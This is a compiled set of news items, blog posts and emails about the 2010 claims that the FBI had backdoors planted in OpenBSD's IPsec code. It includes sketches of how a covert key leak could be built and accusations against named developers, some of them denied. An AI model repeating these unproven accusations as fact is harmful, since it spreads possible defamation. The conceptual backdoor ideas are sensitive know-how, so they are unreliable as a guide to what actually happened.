Thanks for the pointer. Strong stuff, naming names, very unusual, likely to lead to professional suicide. Smells like a hoax or a competitor smear. We wrote last night the alleged author of the allegations for confirmation but have not received an answer. This is not to doubt that the TLAs do this regularly but to admit complicity is exceptional, and if genuine, an admirable public service. If the attribution is a hoax or a smear we’d like to make that known. Have you seen his confirmation or denial anywhere?

He may be in hiding or a sweat hole.

14 December 2010


Michael Shalayeff, (former OpenBSD Developer)
http://mickey.lucifier.net/b4ckd00r.html
how i stopped worrying and loved the backdoor
A lie gets halfway around the world before the truth has a chance to get its pants on.
winston churchill

first of all i have to mention that netsec involvement was indirectly one of the first financial successes of theo de raadt (later mr.t for short) as the sale of 2500 cds through the EOUSA project (one for each us-ins office in the country) brought openbsd to profitable state and allowed mr.t to finance his living by means of the openbsd project.

but let us get back to our sheep (so to speak). as “the disclosure” from herr gregory perry mentioned the parts involved were ipsec(4)) and crypto(4)) framework and the “gigabit ethernet stack.” but see? there is no such thing as “gigabit ethernet stack.” moreover back then all the gigabit ethernet drivers came from freebsd. they were written almost exclusively by bill paul who worked at columbia.edu. he himself does not always disclose where he gets the docs or other tech info for the driver development. drivers were ported to openbsd by jason@ (later mr.j). angelos@ (later mr.a) (who was contracted by netsec to work on the crypto framework in openbsd) was a post-grad student at upenn.edu at the time had contacts at columbia such as his friend and fellow countryman ji@ who worked there. ji@ wrote the ipsec stack initially (for bsd/os 2.0) in 1995. mr.a was porting it to openbsd. if memory serves me right it was during the summer of 2002 that a micro-hacking-session was held at columbia.edu. for less than one week participating all the well known to us already mr.t and mr.j and mr.a with an addition of drahn@ and yours truly. primary goal was to hack on the OCF (crypto framework in openbsd). this does not affect crypto algorithms you’d say right? but why try to plant subtle and enormously complicated to develop side channels into math (encryption and hashing) when it’s way easier to just make the surrounding framework misbehave and leak bits elsewhere? why not just semioccasionally send an ipsec(4)) packet with a plain text key appended to it? the receiver will drop it as broken (check your ipsec stats!) and the sniffer in the middle has the key! how would one do it? a little mbuf(9)) underflow combined with a little integer overflow. not that easy to spot if more than just one line of code is involved. but this is just a really crude example. leaking by just tiny bits over longer time period would be even more subtle.

here are just some observations i had made during ipsec hacking years later… some parts of ipsec code were to say at least strange looking. in some places tiny loops were used where normally one would use a function (such as memcpy(3)) or a bulk random data fetch instead of fetching byte by byte. one has to know that to generate 16 bytes of randomness by the random(4) driver (not the arc4 bit) it would take an md5 algorithm run over 4096 bytes of the entropy pool. of course to generate only one byte 15 bytes would have to be wasted. and thus fetching N bytes one-by-one instead of filling a chunk would introduce a measurable time delay. ain’t these look like pieces of timing weaknesses introduced in ipsec processing in order to make encrypted data analysis easier? some code pieces created buffer underflows leaving uninitialised data or in other words leaking information as well. a common technique to hide changes was (and still is sometimes) to shuffle the code around the file or betweeen different files and directories making actual code review a nightmare. but to be just lots of those things had been since fixed (even by meself).

as the great ones teach us an essential part of any cryptographical system is the random numbers generator. your humble servant was involved in it too and right there in yer olde brooklyn. one breezy spring night i wrote the openbsd random(4) driver that was based on the linux driver written by theodore tso. and of course the output has never been statistically analysed since the day i wrote it. no doubt i ran some basic tests with help of mamasita (she’s keen on math and blintzi). later the arc4 part was added by david maziers (dm@) who was also a friend of mr.a at the time and an openbsd developer. since then a number of vulnerabilities were discovered in the arc4 algorithm and subsequently the driver. most notably this potential key leak.

meanwhile in calgary… wasting no time netsec was secretly funnelling “security fixes” through mr.t that he was committing “stealth” into openbsd tree. (this i only knew years later when i was telling mr.t over a beer about the funny people i met on a west-coast trip (see later)). “stealth” means that purpose of the diffs was not disclosed in the commit messages or the private openbsd development forums except with a few “trusted” developers. it was a custom to hide important development in the openbsd project at that time due to a large netbsd-hate attitude (which also existed from the other side in form of openbsd-hate attitude; just check out this netbsd diff and an openbsd fix later; or a more recent “rewrite for clarity” commit that in fact changes functionality). which was a result of bulk updates of the openbsd sources from netbsd that we were doing back then due to the lack of own developers in many parts of the tree). in this massive code flow it was easy to sneak in a few lines here and there and make sure the “others” will not notice the importance of the change. of course this “stealth” attitude did not stop once openbsd got more developers and continued also in the ipsec areas (see for example). after all “security” was one of the main important keywords that were separating openbsd from netbsd back then. as we can see holding this funnel for netsec is putting mr.t on the payroll also.

actually it would be all too easy to spot the malicious code if it all be in the publicly-available sources. this leads us to believe that bits of the solution were in the hardware. unsurprisingly netsec was producing their own version of hifn(4) crypto accelerator. unfortunately hifn was refusing to disclose full docs for their their hifn7751 chip and that prevented the driver from being included in the openbsd base system. ( in the beginning the driver was called aeon since at that development was done on pre-netsec cards and the driver was renamed (see mv(1)) manually in the cvs repository files later on ). as a bit-chewing disasm-pervert i was asked to reverse engineer their “unlocking” program. that was some magic sequence (since then it’s in the driver) that would initialise the hifn7751 after power-on and allow it to work. they had provided a sample program and challenged us. mr.t set up a machine for me in his house and i logged in remotely from my home in brooklyn to debug the c-code i devised from the disassembly of the unlocking proggy (see they did not even strip(1) it! ;). it was without any help from anybody else except for mr.t who was playing a role of my reset-monkey and yeah mamasita who was bitching at me for being late for dinner… and that worked. this was to show hifn that their “protection” is crap on the stack. the driver for the devices was written by mr.j who had access to public docs that lacked the “unlocking” sequence. this allowed netsec to start deploying their hifn(4)-based cards which by no doubt were a part of the side-channel scheme. about the same time at the bazaar show in nyc i was contacted by a representative of us-ins and a ukrainian millitary attache at un. both investigating my involvement with openbsd. a few months later i was offered an interview for a position at the fbi office for cyber-warfare in nyc who as well offered to fix my immigration status (or none thereof at the time ;) with a greencard. nonetheless for the lack of credibility from the future employer i refused to talk to them as for me deportation did not sound like an acceptable worst-case scenario.

soon enough due to professional contacts of mr.a the darpa grant for the openbsd was materialised. this was for two years work on various crypto technologies to be integrated in openbsd.

alot of the code resulting from the work sponsored by the grant still is in the repository except for parts that were done just for the noise and uncommitted later. of course no wander that darpa grant was spent primarily on mr.t and mr.j. i would expect mr.a was on benefit indirectly. three other developers on the payroll i suppose had to be there such it would not look completely obvious as a payment to mr.t and mr.j. initially mr.t offered me a position on it too but due to upenn.edu restrictions i could not be involved legally (as you can remember i had an expired immigrant status in the country of u.s. of a.). this was slightely disappointing as i had to spend money for coming all the way to philly for the meeting and as it seems for nothing. at least my trip to the following usenix anu-tech in monterey was payed by the moneys from the grant. at the time it only looked kinda funny to travel on the enemy capitalist government’s budget ;) monterey by itself has not much of excitement but for the beach scenery and the cia agents for eastern-europe training camp. that would explain body search at the grayhound bus boarding (this was before the post-2001 scare) which ignored the knife and a whisky bottle i had in my pockets. before going to monterey and while exploring the beauty of san francisco i was contacted once by a us navy intelligence officer who seemingly unintentionally appeared next to me at the bar. later on my way back during a short stay in chicago also randomly appearing fbi agent. fellow was ordering food and beer for me and just like his navy pal gave me a warning to keep my mouth shut!

references:

paranoic mickey       (my employers have changed but, the name has remained)

INTERNET STORM CENTER
OpenBSD IPSec “Backdoor”
http://isc.sans.edu/diary.html?storyid=10087

Published: 2010-12-15,
Last Updated: 2010-12-15 16:21:23 UTC
by Johannes Ullrich (Version: 1)

We received plenty of e-mail alerting us of a mailing list post [1] alleging a backdoor in the Open BSD IPSec code. The story is too good to pass up and repeated on twitter and other media. However, aside from the mailing list post, there is little if any hard evidence of such a backdoor. The code in question is 10 years old. Since then, it has been changed, extended, patched and copied many times. I personally do not have the time nor the skill to audit code of the complexity found in modern crypto implementations. But my gut feeling is that this is FUD if not an outright fraud.

Keep using VPNs, if you are worried, limit the crypto algorithms used to more modern once. It is always a good idea to build additional defensive layers and review configurations from time to time. But at some point, you have to decide who you trust in this game and how paranoid you can afford to be.

[1] http://marc.info/?l=openbsd-tech&m=129236621626462&w=2
——
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter
Keywords: backdoor FBI openbsd
1 comment(s)


FBI accused of planting backdoor in OpenBSD IPSEC stack
By Ryan Paul
http://arstechnica.com/open-source/news/2010/12/fbi-accused-of-planting-backdoor-in-openbsd-ipsec-stack.ars

In an e-mail sent to BSD project leader Theo de Raadt, former NETSEC CTO Gregory Perry has claimed that NETSEC developers helped the FBI plant “a number of backdoors” in the OpenBSD cryptographic framework approximately a decade ago.

Perry says that his nondisclosure agreement with the FBI has expired, allowing him to finally bring the issue to the attention of OpenBSD developers. Perry also suggests that knowledge of the FBI’s backdoors played a role in DARPA’s decision to withdraw millions of dollars of grant funding from OpenBSD in 2003.

“I wanted to make you aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA, the parent organization to the FBI,” wrote Perry. “This is also probably the reason why you lost your DARPA funding, they more than likely caught wind of the fact that those backdoors were present and didn’t want to create any derivative products based upon the same.”

The e-mail became public when de Raadt forwarded it to the OpenBSD mailing list on Tuesday, with the intention of encouraging concerned parties to conduct code audits. To avoid entanglement in the alleged conspiracy, de Raadt says that he won’t be pursuing the matter himself. Several developers have begun the process of auditing the OpenBSD IPSEC stack in order to determine if Perry’s claims are true.

“It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack,” de Raadt wrote. “Since we had the first IPSEC stack available for free, large parts of the code are now found in many other projects/products. Over 10 years, the IPSEC code has gone through many changes and fixes, so it is unclear what the true impact of these allegations are.”

OpenBSD developers often characterize security as one of the project’s highest priorities, citing their thorough code review practices and proactive auditing process as key factors that contribute to the platform’s reputedly superior security. If Perry’s allegations prove true, the presence of FBI backdoors that have gone undetected for a decade would be a major embarrassment for OpenBSD.

The prospect of a federal government agency paying open source developers to inject surveillance-friendly holes in operating systems is also deeply troubling. It’s possible that similar backdoors could potentially exist on other software platforms. It’s still too early to know if the claims are true, but the OpenBSD community is determined to find out if they are.


Deconstructing the OpenBSD IPsec Rumors
2010-12-14 21:58:01 by Jason Dixon
http://obfuscurity.com/2010/12/Deconstructing-the-OpenBSD-IPsec-Rumors

Theo de Raadt posted an email to the openbsd-tech mailing list Tuesday evening which contained details of alleged backdoors added to the OpenBSD IPsec code by government contractors some ten years ago. Subsequent posts from Bob Beck and Damien Miller add further commentary, but neither confirm nor deny the allegations. Damien goes so far as to propose a number of possible avenues as the most likely places to begin a new audit.

One of the purported conspirators is Jason Wright, a cryptology expert at the Idaho National Laboratory, who committed a significant amount of crypto and sparc64 code to the OpenBSD project. Although I haven’t seen Jason in years, I consider”Wookie” a good friend and hope these accusations are false. If Damien’s hypothesis is correct, it seems highly unlikely that Jason (or any US developers) introduced backdoors directly into the crypto code. A more likely scenario would be the malicious reuse of mbufs in the network stack.

As Brian T. Merritt suggests, it seems even more likely that Linux would be similarly “exploited”. Lest we forget that while these claims against OpenBSD revolve around FBI involvement, Linux has had significant portions of its security code infiltrated by the NSA. Between these two code bases you’re talking about an enormous portion of the networking infrastructure that powers the Internet.

As a former OpenBSD committer, this saddens me. Not just because of the possibility that this might be true, but that regardless of whether or not this could be true, it means that developer and community resources will be swallowed into the rumor vacuum for untold weeks and possibly months. This results in less innovation, fewer bugfixes, and worst of all, a growing distrust among everyone involved.

This story has all the characteristics of being newsworthy for a long while. It has already made major headlines across Twitter, Slashdot, Reddit and OSNews. Most articles and tweets imply that the claims are fact, without any investigation of the source claim or the actual code in question. I hope that all parties involved are cleared of any wrongdoing. Either way, the cat is out of the proverbial bag. These claims will undermine a significant portion of goodwill and trust among all Free Software / Open Source projects. In the end, nobody wins.


The OpenBSD IPSec kerfuffle
Michael W Lucas, December 15th, 2010
http://blather.michaelwlucas.com/?p=452

By now you’ve probably heard of the allegations Theo forwarded to the OpenBSD-tech mailing list about the FBI introducing back doors in early versions of the OpenBSD IPSec code.  I’d like to offer my opinion, in the spirit of the Christmas season:

“Bah, humbug!”

It’s possible, but unlikely.  Like me winning the lottery is unlikely.  I’d need to buy a ticket, and that isn’t going to happen any time soon.

The OpenBSD group examines every line of code that goes into their tree.  Any obvious back door would be caught.  Any  subtle back door would be fragile — so subtle that it probably wouldn’t survive the intervening ten years of code churn and IPSec improvements.  Maybe someone has an appliance based on, say, OpenBSD 2.8 or 3.2, which could have contained the back door.  If true, we need to know about it.  But those users need to upgrade anyway.

And the FBI?  Nope, don’t believe it.  Ten years ago, the FBI was having lots of trouble understanding the Internet.  The NSA, maybe.

Bugs?  Sure, there’s probably bugs.  I expect we’ll find some, now that many eyes have turned to the code.  Exploitable bugs?  Maybe.  But that’s not the same as a back door.

OpenBSD has claimed to be the best for many years.  That claim motivates people to take them down.  The claims have hopefully inspired many people to examine the current and historical IPSec stack.  Theo and company have done nothing to discourage such audits: they’ve even offered pointers on where to look.  If you’re a programmer looking to make a splash, you could do worse than to join in on auditing the code.  Finding the alleged back door would make your reputation.  And we can always use more IPSec hackers.

The real impact might be, as Jason Dixon points out, the cost in OpenBSD developer time.  You know that some of their committers are examining the IPSec code today, trying to find potential back doors.


Schneier on Security

http://www.schneier.com/blog/archives/2010/12/did_the_fbi_pla.html
A blog covering security and security technology.
December 17, 2010
Did the FBI Plant Backdoors in OpenBSD?
It has been accused of it.
I doubt this is true. One, it’s a very risky thing to do. And two, there are more than enough exploitable security vulnerabilities in a piece of code that large. Finding and exploiting them is a much better strategy than planting them. But maybe someone at the FBI is that dumb.
EDITED TO ADD (12/17): Further information is here. And a denial from an FBI agent.
Posted on December 17, 2010 at 10:49 AM


FREEBSD DEVELOPER POSTS TRIPLE-BOUNTY FOR OPENBSD FLAWS
Dag-Erling Smørgrav (aka DES)
2010-12-15
http://maycontaintracesofbolts.blogspot.com/2010/12/openbsd-ipsec-backdoor-allegations.html

OpenBSD IPSec backdoor allegations: triple $100 bounty
In case you hadn’t heard: Gregory Perry alleges that the FBI paid OpenBSD contributors to insert backdoors into OpenBSD’s IPSec stack, with his (Perry’s) knowledge and collaboration.

If that were true, it would also be a concern for FreeBSD, since some of our IPSec code comes from OpenBSD.

I’m having a hard time swallowing this story, though. In fact, I think it’s preposterous. Rather than go into further detail, I’ll refer you to Jason Dixon’s summary, which links to other opinions, and add only one additional objection: if this were true, there would be no “recently expired NDA”; it would be a matter of national security.

I’ll put my money where my mouth is, and post a triple bounty:

1) I pledge USD 100 to the first person to present convincing evidence showing:
– that the OpenBSD Crypto Framework contains vulnerabilities which can be exploited by an eavesdropper to recover plaintext from an IPSec stream,
– that these vulnerabilities can be traced directly to code submitted by Jason Wright and / or other developers linked to Perry, and
– that the nature of these vulnerabilities is such that there is reason to suspect, independently of Perry’s allegations, that they were inserted intentionally—for instance, if the surrounding code is unnecessarily awkward or obfuscated and the obvious and straightforward alternative would either not be vulnerable or be immediately recognizable as vulnerable.
– I pledge an additional USD 100 to the first person to present convincing evidence showing that the same vulnerability exists in FreeBSD.
– Finally, I pledge USD 100 to the first person to present convincing evidence showing that a government agency successfully planted a backdoor in a security-critical portion of the Linux kernel.

Additional conditions:
– In all three cases, the vulnerability must still be present and exploitable when the evidence is assembled and presented to the affected parties. Allowances will be made for the responsible disclosure process.
– Exploitability must be demonstrated, not theorized.
– I will not evaluate the evidence myself, but rely on the consensus of the OpenBSD, FreeBSD, Linux and / or infosec communities.
– Primacy will be determined in a similar manner.
– The evidence must be presented, and the bounty claimed, no later than 2012-12-31 23:59:59 UTC—a little more than two years from today.
– The bounty will, at the claimant’s discretion, either be transferred to the claimant by PayPal—no cash, checks, direct deposits or wire transfers—or donated directly to a non-profit of his or her choice.

Dag-Erling Smørgrav can be reached at:
des@des.no


OpenBSD/FBI allegations denied by named participants
Update: Government shilling accusations refuted by both similarly named persons
Tags: backdoors, EOUSA, FBI, OpenBSD
Brian Proffitt, December 14, 2010, 10:32 PM — http://www.itworld.com/open-source/130820/openbsdfbi-allegations-denied-named-participant

Update: This story was updated at 0920 on Dec. 15 to include comments from the second Scott Lowe, and expand on additional questions now sent to Gregory Perry.

Amidst startling accusations revealed by OpenBSD founder and lead developer Theo de Raadt today that 10 years ago the US Federal Bureau of Investigations paid developers to insert security holes into OpenBSD code, some confusion about the accusations has already emerged, with one named party strongly denying any involvement.

According to a post by de Raadt on the [openbsd-tech] mailing list, he received an email from Gregory Perry, CEO of GoVirtual Education, a Florida-based VMWare training firm, in which Perry told de Raadt he was “aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA [an acronym for the US Dept. of Justice], the parent organization to the FBI.”

In his message to de Raadt, Perry stated that while Perry was the CTO at NETSEC, “Jason Wright and several other developers were responsible for those backdoors.” Perry said that he was now able to share this information with de Raadt because his non-disclosure agreement with the FBI had “recently expired.”

If true, this type of government involvement would enhance the already present concerns free and open source developers tend to have about government policies concerning privacy.

But there are already challenges about the accuracy of Perry’s statements.

For instance, at the close of his message to de Raadt, Perry stated that the presence of these backdoors were why “several inside FBI folks have been recently advocating the use of OpenBSD for VPN and firewalling implementations in virtualized environments.”

“For example,” Perry concluded, “Scott Lowe is a well respected author in virtualization circles who also happens top [sic] be on the FBI payroll, and who has also recently published several tutorials for the use of OpenBSD VMs in enterprise VMWare vSphere deployments.”

I contacted Scott Lowe, VMWare-Cisco Solutions Principal at EMC this evening to ask if he had a comment about Perry’s statement to de Raadt. Lowe quickly responded via e-mail his denial:

“Mr. Perry is mistaken. I am not, nor have I ever been, affiliated with or employed by the FBI or any other government agency. Likewise, I have not ever contributed a single line of code to OpenBSD; my advocacy is strictly due to appreciation of the project and nothing more,” Lowe replied.

When I followed up with the question of why Perry might want to implicate Lowe for assisting the FBI in promoting OpenBSD, Lowe replied, “I do not know why Mr. Perry mentioned my name. I do know that there is another Scott Lowe, who also writes about virtualization, to whom Mr. Perry might be referring; I don’t have any information as to whether that individual is or is not involved.”

Mr. Lowe from North Carolina has been confused with the other Scott Lowe, Vice President and Chief Information Officer at Westminster College in Missouri, before.

Update:Mr. Lowe of Missouri was contacted for comment late last night, and did reply to my questions via e-mail early this morning.

“I am not, nor have I ever been, on the FBI’s payroll, nor do I use or advocate the use of OpenBSD either personally or in my writing,” Lowe of Missouri replied.

Perry may have gotten his Scott Lowes confused; stranger things have happened. Earlier in my own career, I was often confused with Brian Proffit, a prolific and excellent writer about OS/2 who is also a Baptist minister (trust me, I’m the evil twin).

The North Carolina Lowe has published articles and books on VMWare, while the Missouri Lowe has published his work primarily on TechRepublic, with more of a focus on Microsoft technologies, rather than VMware.

With the response of both Lowes on record, the question of mistaken identity becomes moot. It now becomes Perry’s word against two Scott Lowes’ that one of these gentlemen was promoting of OpenBSD happening on behalf of the FBI. It makes me wonder if Perry was speculating about Lowe’s alleged involvement with the FBI.

I have reached out to Perry for comment; specifically to elaborate the evidence he has regarding the involvement of a Scott Lowe, and to identify the Scott Lowe to which he was referring. As of 0920 EST on December 15, no reply from Perry has been received.


An FBI backdoor in OpenBSD?
by Robert McMillan, Security Blanket
Wed, 2010-12-15 09:06
Topic(s): Data Protection
http://blogs.csoonline.com/1296/an_fbi_backdoor_in_openbsd

You have to give Theo de Raadt credit: he’s into openness. What other software product would take serious, but questionable allegations about an FBI-planted back door in its code and just go public with them?

That’s what OpenBSD’s de Raadt did Tuesday after a former government contractor named Gregory Perry came forward and told him that the FBI had put a number of back doors in OpenBSD’s IPsec stack, used by VPNs to do cryptographically secure communications over the Internet.

The allegations could make many people think twice about the security of OpenBSD, but the way de Raadt handled the matter will probably have the opposite effect — giving them another reason to trust the software.

Here’s what de Raadt said:

I refuse to become part of such a conspiracy, and
will not be talking to Gregory Perry about this.  Therefore I am
making it public so that
(a) those who use the code can audit it for these problems,
(b) those that are angry at the story can take other actions,
(c) if it is not true, those who are being accused can defend themselves.

I contacted Perry about his email, and while I couldn’t get him on the telephone, he confirmed that his letter to de Raadt was published without his consent. He gave a few more details on his involvement with the FBI (which, by the way, has no immediate comment on this).

Hello Robert,

I did not really intend for Theo to cross post that message to the rest of the Internet, but I stand by my original email message to him in those regards.

The OCF was a target for side channel key leaking mechanisms, as well as pf (the stateful inspection packet filter), in addition to the gigabit Ethernet driver stack for the OpenBSD operating system; all of those projects NETSEC donated engineers and equipment for, including the first revision of the OCF hardware acceleration framework based on the HiFN line of crypto accelerators.

The project involved was the GSA Technical Support Center, a circa 1999 joint research and development project between the FBI and the NSA; the technologies we developed were Multi Level Security controls for case collaboration between the NSA and the FBI due to the Posse Commitatus Act, although in reality those controls were only there for show as the intended facility did in fact host both FBI and NSA in the same building.

We were tasked with proposing various methods used to reverse engineer smart card technologies, including Piranha techniques for stripping organic materials from smart cards and other embedded systems used for key material storage, so that the gates could be analyzed with Scanning Electron and Scanning Tunneling Microscopy.  We also developed proposals for distributed brute force key cracking systems used for DES/3DES cryptanalysis, in addition to other methods for side channel leaking and covert backdoors in firmware-based systems.  Some of these projects were spun off into other sub projects, JTAG analysis components etc.  I left NETSEC in 2000 to start another venture, I had some fairly significant concerns with many aspects of these projects, and I was the lead architect for the site-to-site VPN project developed for Executive Office for United States Attorneys, which was a statically keyed VPN system used at 235+ US Attorney locations and which later proved to have been backdoored by the FBI so that they could recover (potentially) grand jury information from various US Attorney sites across the United States and abroad.  The person I reported to at EOSUA was Zal Azmi, who was later appointed to Chief Information Officer of the FBI by George W. Bush, and who was chosen to lead portions of the EOUSA VPN project based upon his previous experience with the Marines (prior to that, Zal was a mujadeen for Usama bin Laden in their fight against the Soviets, he speaks fluent Farsi and worked on various incursions with the CIA as a linguist both pre and post 911, prior to his tenure at the FBI as CIO and head of the FBI’s Sentinel case management system with Lockheed).  After I left NETSEC, I ended up becoming the recipient of a FISA-sanctioned investigation, presumably so that I would not talk about those various projects; my NDA recently expired so I am free to talk about whatever I wish.

Here is one of the articles I was quoted in from the NY Times that touches on the encryption export issue:
http://www.nytimes.com/1999/10/11/business/technology-easing-on-software-exports-has-limits.html?pagewanted=all

In reality, the Clinton administration was very quietly working behind the scenes to embed backdoors in many areas of technology as a counter to their supposed relaxation of the Department of Commerce encryption export regulations – and this was all pre-911 stuff as well, where the walls between the FBI and DoD were very well established, at least in theory.

Some people have decided that Perry’s claims are not credible, and at least one person named in his email has come forward to say it’s not true.  But at this point, it seems that nobody but Perry really knows what’s going on.

It’s hard to really know what to say at this point. We’re talking about backdoors that probably just look like regular old bugs in code that was written 10 years ago.


CNET’s Declan McCullagh spotted the following tweet from former FBI agent E.J. Hilbert:

I was one of the few FBI cyber agents when the coding supposedly happened. Experiment yes. Success No.http://myloc.me/fiubs
7:57 PM Dec 14th via ÜberTwitter from Las Flores, CA
ejhilbert
E.J. Hilbert
https:// twitter.com /ejhilbert/status/14891845825863680

4 DAYS LATER:

@vze2p5 I commented to spark a discussion. Many take social media as truth rather than question & discuss. Its the former teacher in me
12:25 AM Dec 18th via TweetDeck in reply to vze2p5

https:// twitter.com /ejhilbert


CNET
http://news.cnet.com/8301-31921_3-20025767-281.html

Report of FBI back door roils OpenBSD community
by Declan McCullagh, December 15, 2010 11:08 AM PST

Allegations that the FBI surreptitiously placed a back door into the OpenBSD operating system have alarmed the computer security community, prompting calls for an audit of the source code and claims that the charges must be a hoax.

The report surfaced in e-mail made public yesterday from a former government contractor, who alleged that he worked with the FBI to implement “a number of back doors” in OpenBSD, which has a reputation for high security and is used in some commercial products.

Gregory Perry, the former chief technologist at the now-defunct contractor Network Security Technology, or NETSEC, said he’s disclosing this information now because his 10-year confidentiality agreement with the FBI has expired. The e-mail was sent to OpenBSD founder Theo de Raadt, who posted it publicly.

“I cashed out of the company shortly after the FBI project,” Perry told CNET today. “At that time there were significant legal barriers between domestic law enforcement and [the Department of Defense], and [this project] was in clear violation of that.” He said the project was a “circa 1999 joint research and development project between the FBI and the NSA,” which is part of the Defense Department.

The OpenBSD project, which was once funded by DARPA but had its funding yanked in 2003 for unspecified reasons, says that it takes an “uncompromising view toward increased security.” The code is used in Microsoft’s Windows Services for Unix and firewalls including ones sold by Calyptix Security, Germany’s Swapspace.de, and Switzerland’s Apsis GmbH.

In national security circles, it’s an open secret that the U.S. government likes to implant back doors in encryption products.
That’s what the FBI proposed in September, although it also claimed that the crypto-back doors would be used only through a legal process. So did the Clinton administration, in what was its first technology initiative in the early 1990s, which became known as the Clipper Chip.

If implemented correctly using a strong algorithm, modern encryption tools are believed to be so secure that even the NSA’s phalanxes of supercomputers are unable to decrypt messages or stored data. One report noted that, even in the 1990s, the FBI was unable to successfully decrypt communications from some wiretaps, and a report this year said it could not decrypt hard drives using the AES algorithm with a 256-bit key.

E.J. Hilbert, a former FBI agent, indicated in a note on Twitter last night that the OpenBSD “experiment” happened but was unsuccessful.

The Justice Department did not respond to a request from CNET yesterday for comment.

NETSEC, the now-defunct contractor, boasted at the time that it was a top provider of computer security services to the Justice Department, the Treasury Department, the National Science Foundation, and unnamed intelligence agencies. A 2002 NSF document (PDF) says NETSEC was “a contractor that NSF utilizes for computer forensics” that performed an investigation of whether data “deleted from an internal NSF server” amounted to a malicious act or not.

A snapshot of the NETSEC Web page from August 2000 from Archive.org shows that the company touted its close ties with the NSA. The founders created the company to build “upon practices developed while employed at the National Security Agency (NSA) and Department of Defense (DoD), the methodologies utilized at NETSEC today are widely regarded as the best anywhere,” it says.

On the OpenBSD technical mailing list, reaction was concerned but skeptical. One post suggested that the best way to insert a back door would be to leak information about the cryptographic key through the network, perhaps through what’s known as a side channel attack. (A 2000 paper describes that technique as using information about the specific implementation of the algorithm to break a cipher, in much the same way that radiation from a computer monitor can leak information about what’s on the screen. Secure environments use TEMPEST shielding to block that particular side channel.)

A 1999 New York Times article written by Peter Wayner about the Clinton administration’s encryption policies, which quoted Perry about OpenBSD, noted that the “the Naval Research Lab in Virginia is using OpenBSD as a foundation of its new IPv6 project.”
Perry told CNET that he hired Jason Wright “at NETSEC as a security researcher, he was basically paid to develop full time for the OpenBSD platform.” In the e-mail to de Raadt, Perry added that “Jason Wright and several other developers were responsible for those back doors, and you would be well advised to review any and all code commits by Wright as well as the other developers he worked with originating from NETSEC.”
Wright’s LinkedIn profile lists him as a “senior developer” at the OpenBSD project and a cybersecurity engineer at the Idaho National Laboratory, and previously a software engineer at NETSEC. He did not respond to a request for comment.

A decades-long push for back doors
While the OpenBSD allegations may never be fully proved or disproved, it’s clear that the federal government has a long history of pressing for back doors into products or networks for eavesdropping purposes. The Bush administration-era controversy over pressuring AT&T to open its network–in apparent violation of federal law–is a recent example.
Louis Tordella, the longest-serving deputy director of the NSA, acknowledged overseeing a similar project to intercept telegrams as recently as the 1970s. It relied on the major telegraph companies, including Western Union, secretly turning over copies of all messages sent to or from the United States.

“All of the big international carriers were involved, but none of ’em ever got a nickel for what they did,” Tordella said before his death in 1996, according to a history written by L. Britt Snider, a Senate aide who became the CIA’s inspector general.

The telegraph interception operation was called Project Shamrock. It involved a courier making daily trips from the NSA’s headquarters in Fort Meade, Md., to New York to retrieve digital copies of the telegrams on magnetic tape.

Like the eavesdropping system authorized by President Bush, Project Shamrock had a “watch list” of people in the U.S. whose conversations would be identified and plucked out of the ether by NSA computers. It was intended to be used for foreign intelligence purposes.

Then-President Richard Nixon, plagued by anti-Vietnam protests and worried about foreign influence, ordered that Project Shamrock’s electronic ear be turned inward to eavesdrop on American citizens. In 1969, Nixon met with the heads of the NSA, CIA and FBI and authorized a program to intercept “the communications of U.S. citizens using international facilities,” meaning international calls, according to James Bamford’s 2001 book titled “Body of Secrets.”

Nixon later withdrew the formal authorization, but informally, police and intelligence agencies kept adding names to the watch list. At its peak, 600 American citizens appeared on the list, including singer Joan Baez, pediatrician Benjamin Spock, actress Jane Fonda, and the Rev. Martin Luther King Jr.

Another apparent example of NSA and industry cooperation became public in 1995. The Baltimore Sun reported that for decades NSA had rigged the encryption products of Crypto AG, a Swiss firm, so U.S. eavesdroppers could easily break their codes.

The six-part story, based on interviews with former employees and company documents, said Crypto AG sold its compromised security products to some 120 countries, in

http://news.cnet.com/8301-31921_3-20025767-281.html
http://marc.info/?l=openbsd-tech&m=129236621626462&w=2
http://en.wikipedia.org/wiki/Theo_de_Raadt
http://news.cnet.com/Defense-agency-pulls-OpenBSD-funding/2100-1016_3-997393.html?tag=mncol;txt
http://www.openbsd.org/security.html
http://technet.microsoft.com/en-us/library/bb496994.aspx
http://calyptix.com/
http://www.swapspace.de/flash/index.html
http://www.apsis.ch/
http://news.cnet.com/8301-31921_3-20017671-281.html?tag=mncol;txt
http://news.cnet.com/8301-31921_3-20017671-281.html?tag=mncol;txt
http://www.dtic.mil/cgi-bin/GetTRDoc?Location=U2&doc=GetTRDoc.pdf&AD=ADA485001
http://yro.slashdot.org/story/10/06/26/1825204/FBI-Failed-To-Break-Encryption-of-Hard-Drives
https:// twitter.com /ejhilbert/status/14891845825863680
http://www.nsf.gov/pubs/2002/oigseptember2001/pdffiles/investigations.pdf
http://web.archive.org/web/20000815072218/www.netsec.net/info.html
http://marc.info/?l=openbsd-tech&m=129237675106730&w=2
http://www.schneier.com/paper-side-channel2.pdf
http://en.wikipedia.org/wiki/TEMPEST
http://www.nytimes.com/1999/10/11/business/technology-easing-on-software-exports-has-limits.html?pagewanted=print
http://thought.net/jason/
http://www.linkedin.com/in/jasonwright
https://inlportal.inl.gov/portal/server.pt/community/inl_portal_support/547
http://news.cnet.com/8301-13578_3-10143520-38.html?tag=mncol;txt
http://articles.baltimoresun.com/1995-12-10/news/1995344157_1_sting-encryption-sun


FINAL REFLECTIONS
(contemplate until someone comes up with the actual FBI-compromised code)

http://cm.bell-labs.com/who/ken/trust.html

Reflections on Trusting Trust
Ken Thompson

Reprinted from Communication of the ACM, Vol. 27, No. 8, August 1984, pp. 761-763. Copyright © 1984, Association for Computing Machinery, Inc. Also appears in ACM Turing Award Lectures: The First Twenty Years 1965-1985 Copyright © 1987 by the ACM press and Computers Under Attack: Intruders, Worms, and Viruses Copyright © 1990 by the ACM press.
I copied this page from the ACM, in fear that it would someday turn stale.

Introduction

